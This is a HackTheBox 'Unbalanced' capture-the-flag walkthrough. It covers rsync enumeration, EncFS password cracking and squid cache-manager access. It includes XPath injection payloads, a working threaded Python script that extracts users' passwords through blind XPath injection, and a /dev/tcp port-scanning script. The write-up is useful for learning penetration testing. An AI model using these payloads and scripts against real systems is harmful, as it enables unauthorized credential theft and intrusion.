HackTheBox - Unbalanced

Nmap scan results (All port scan)

nmap -sC -sV -oA nmap-allportscan -T4 10.10.10.200

rsync is a utility for efficiently transferring and synchronizing files between a computer and an external hard drive and across networked computers by comparing the modification times and sizes of files.

Setting Up SQUID Proxy in the browser

We have SQUID Proxy server running on port 3128. SQUID Proxy is normally used for filtering web traffic coming from the external network i.e Internet. I will be using Foxy Proxy for setting it up.

We don't really get anything, so we can proceed with Rsync Enumeration. Read about rsync over here.

Enumerating RSYNC Protocol

apt install rsync # Install Rsync using the following command

A goto checklist that I always follow - https://book.hacktricks.xyz/pentesting/873-pentesting-rsync

We can enumerate shared folders using the following command.

rsync -av --list-only rsync://10.10.10.200/

rsync -av --list-only rsync://10.10.10.200/conf_backups

This command will list all the files present inside conf_backups.

To copy all the files locally, we can create a directory and transfer it using the following command.

mkdir backups
rsync -av rsync://10.10.10.200/conf_backups ./backups

Working with EncFS (FUSE-based cryptographic filesystem)

This directory consists of junk files and a .encfs6.xml file. EncFS is a cryptographic file system which encrypts all the files present in that directory. We need to know the password to decrypt all the files.

https://linuxconfig.org/how-to-encrypt-directory-with-encfs-on-debian-9-stretchlinuxconfig.org

encfs ./encrypted_folder ./decrypt_data
# This command will decrypt the directory (Password is required)

We can use encfs2john.py to create a hash and later crack it using John itself.

Now that we have the password, we can decrypt it.

Analyzing squid.conf file

This one looks interesting as we are allowed to access intranet.unbalanced.htb domain. We also have this cache_mgr password.

Cache Manager Access Control (SQUID)

This looks like a login portal for employees. I tried default usernames/passwords and also tried using the previously found passwords, but didn't get anything. We have cache_mgr passwd, that means we can browse the internal squid manager configuration.

https://wiki.squid-cache.org/Features/CacheManagerwiki.squid-cache.org

curl --user ':Thah$Sh1' http://10.10.10.200:3128/squid-internal-mgr/menu

We can check FQDN (fully qualified domain name) Cache for potential IPs and hostnames.

The FQDN cache is a built-in component of squid providing Hostname to IP-Number translation functionality and managing the involved data-structures. ... The FQDN cache usually doesn't block on a request except for special cases where this is desired (see below).

This intranet-hostx.unbalanced.htb are probably the load balancers. A load balancer is a device that acts as a reverse proxy and distributes network or application traffic across a number of servers. Load balancers are used to increase capacity (concurrent users) and reliability of applications.

Found a web page which can be vulnerable

Checking around the IP Addresses, I found this webpage and it was taken down due to security issues. (Looks interesting and can contain vulnerabilities). Let's run a gobuster scan against this IP.

gobuster dir --proxy http://10.10.10.200:3128/ -u http://172.31.179.1/ -w /opt/SecLists/Discovery/Web-Content/raft-medium-words.txt -x php,html,txt

This website is responsive, maybe we can try for SQL Injection on the login page. I tried using sqlmap to automate the process but didn't get anything.

Exploiting XPATH Injection

This one looks like a XPATH Injection. We can try to inject basic authentication payloads from here.

XPATH injection - HackTricksbook.hacktricks.xyz

This is definitely XPATH Injection. We can exploit this with a script to get all the usernames and passwords.

' or Username='rita' and string-length(Password/text())=num and ''=' // To extract the length
' or Username='rita' and substring(Password/text(),{},1)='a' and ''=' // To extract the password

#!/usr/bin/env python

import requests
import string
import threading
import time

url = "http://172.31.179.1/intranet.php"
proxies = {'http':'10.10.10.200:3128'}
headers = {
    "Content-Type":"application/x-www-form-urlencoded",
    "User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
    "Referer":"http://172.31.179.1/intranet.php",
    "Origin":"http://172.31.179.1"
}
chars = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@\$"
print chars
# users = ['bryan','rita,''sarah','jim']

class myThread (threading.Thread):
    def __init__(self, threadID, user):
        threading.Thread.__init__(self)
        self.threadID = threadID
        self.user = user
    def run(self):
        pass_length = length_extraction(self.user)
        password = xpath_injection(self.user,pass_length)
        print("[+] Creds found for {} : {}".format(self.user,password))
# Trying
def xpath_injection(user,length):
    passwd = ""
    for i in range(1,length+1):
        for char in chars:
            payload = {
                "Username":"admin",
                "Password":"' or Username='{}' and substring(Password/text(),{},1)='{}' and ''='".format(user,i,char)
            }
            resp = requests.post(url,data=payload,headers=headers,proxies=proxies)
            if user in resp.text:
                passwd += char
                break
    return passwd    

# Working properly
def length_extraction(user):
    for i in range(30):
        payload = {
            "Username":"admin",
            "Password":"' or Username='{}' and string-length(Password/text())={} and ''='".format(user,i)
        }
        resp = requests.post(url,data=payload,headers=headers,proxies=proxies)
        if user in resp.text:
            print("[+] Length found: {}".format(i))
            return i
            break

starttime = time.asctime(time.localtime(time.time()))
print("[+] Script Started at {}".format(starttime))
# Calculating pass length for users
thread1 = myThread(1,"bryan").start()
thread2 = myThread(2,"rita").start()
thread3 = myThread(3,"jim").start()
thread4 = myThread(4,"sarah").start()

SSH Access as bryan user

# TODO List for byran user
############
# Intranet #
############
* Install new intranet-host3 docker [DONE]
* Rewrite the intranet-host3 code to fix Xpath vulnerability [DONE]
* Test intranet-host3 [DONE]
* Add intranet-host3 to load balancer [DONE]
* Take down intranet-host1 and intranet-host2 from load balancer (set as quiescent, weight zero) [DONE]
* Fix intranet-host2 [DONE]
* Re-add intranet-host2 to load balancer (set default weight) [DONE]
- Fix intranet-host1 [TODO]
- Re-add intranet-host1 to load balancer (set default weight) [TODO]

###########
# Pi-hole #
###########
* Install Pi-hole docker (only listening on 127.0.0.1) [DONE]
* Set temporary admin password [DONE]
* Create Pi-hole configuration script [IN PROGRESS]
- Run Pi-hole configuration script [TODO]
- Expose Pi-hole ports to the network [TODO]

Discovering Pi-Hole running on docker network

There's Pi-hole running on docker network. We need to find the IP Address for that machine. For that, we can use ip neigh command.

172.31.11.3 - Pi-hole might be running on this IP. To check, we can scan the ports using static nmap binary or by creating a simple bash script. The Pi-hole runs with 53 and 80 port to be opened (Default ports)

#!/bin/bash

ip=$1

if [[ $# -eq 0 ]];then
        echo "[-] Supply IP Address"
        exit 0
fi

for i in `seq 1 65535`;do
        echo 1 > /dev/tcp/$ip/$i
        if [[ $? -eq 0 ]];then
                echo "[+] Port open: $i"
        fi
done